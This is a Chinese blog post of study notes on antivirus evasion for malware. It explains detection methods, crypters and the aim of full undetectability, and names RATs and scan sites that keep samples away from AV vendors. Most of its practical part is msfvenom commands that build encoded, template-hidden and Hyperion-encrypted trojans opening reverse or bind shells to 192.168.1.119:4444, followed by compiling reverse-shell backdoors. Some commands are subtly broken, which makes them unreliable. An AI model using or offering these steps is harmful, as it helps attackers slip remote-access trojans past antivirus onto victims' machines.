恶意软件

病毒、木马、蠕虫、键盘记录、僵尸程序、流氓软件、勒索软件、广告程序
在用户非自愿的情况下执行安装
出于某种恶意的目的:控制、窃取、勒索、偷窥、推送、攻击……

防病毒软件

恶意程序最主要的防护手段
称呼:杀毒软件/防病毒软件
功能:客户端/服务器/邮件防病毒

检测原理

基于二进制文件中特征签名的黑名单检测方法,这是最主要的方法
基于行为的分析方法(启发式)

事后手段

永远落后于病毒发展

免杀技术

修改二进制文件中的特征字符

进行替换、擦除、修改

加密技术(crypter)

通过加密使得特征字符不可读,从而逃避AV 检测
运行时分片分段的解密执行,注入进程或 AV 不检查的无害文件中

防病毒软件的检测

既检查恶意程序本身的特征字符
也检查加密器 cripter 的特征字符

当前现状

恶意软件制造者

  • 编写私有的 RAT 软件,避免普遍被 AV 所知的特征字符,使用独有 crypter 软件加密恶意程序,处事低调,尽量避免被发现
  • 没有能力自己编写恶意代码的黑客,通过直接修改特征码的方式免杀

  • Fully UnDetectable 是最高追求 (FUD)

    AV产商

  • 广泛采集样本,尽快发现出现的病毒程序,更新病毒库

  • 一般新的恶意软件安全 UD 窗口期是一周左右
  • 与恶意软件制造者永无休止的拉锯战

  • 新的启发式检测技术尚有待完善(误杀漏杀)

    单一 AV 厂商的病毒库很难达到 100% 覆盖

    这两个在线多引擎查杀网站与 AV 查杀共享信息
    https://www.virustotal.com/
    接口被某些国家的AV软禁免费利用,没有自己的病毒库

  • http://www.virscan.org/

  • 这两个是搞黑的在线多引擎查毒站
  • https://nodistribute.com/
  • http://viruscheckmate.com/check/

常用的 RAT 软件
灰鸽子、波尔、黑暗彗星、潘多拉、NanoCore

msf的一些例子

  1. #生成反弹shell
  2. msfvenom -p windows/shell/bind_tcp lhost=192.168.1.119 lport=4444 -a x86 --platform win -f exe -o a.exe
  3. #-p是payload,-a是系统架构,--platform是平台,-f是软件格式,-o是命名
  4. #加密编码反弹shell
  5. msfvenom -p windows/shell/bind_tcp lhost=192.168.1.119 lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe
  6. #-e指定加密模块,-i是加密次数,这里重复加密,-b是特殊字符过滤
  7. #对比两者里面可读内容
  8. string a.exe
  9. string b.exe
  10. #在上面的网站里查下这两个,大概能有50%查出
  11. #利用模板隐藏shell
  12. msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.1.119 lport=4444 -a x86 --platform win -f exe -o c.exe
  13. #-x指定模板,plink是个putty工具
  14. #多重编码
  15. msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.1.119 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 --platform win -f exe > d.exe

软件保护

  • 软件开发商为保护版权,采用的混淆和加密技术避免盗版逆向
  • 常被恶意软件用于免杀目的

    Hyperion (32bit PE 程序加密器)

    Crypter / Container(解密器 PE Loader )
    git clone https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-2.3.zip
    unzip Hyperion-2.3.zip
    dpkg —add-architecture i386 && apt-get update && apt-get install wine32
    生成加密器
    cd Hyperion-1.2 && i686-w64-mingw32-g++ -static-libgcc -static-libstdc++ Src/Crypter/*.cpp -o h.exe
    生成木马程序
    msfvenom -p windows/shell/reverse_tcp lhost=192.168.1.119 lport=4444 —platform win -e x86/shikata_ga_nai -a x86 -f exe -o p.exe
    对木马程序进行加密
    wine h.exe p.exe x.exe
    得到x.exe

    编写后门

    Windows reverse shell
    – wine gcc.exe windows.c -o windows.exe -lws2_32
    ▪ Linux shell
    – gcc linux_revers_shell.c -o linux
    原文链接:https://blog.csdn.net/weixin_44604541/article/details/105629833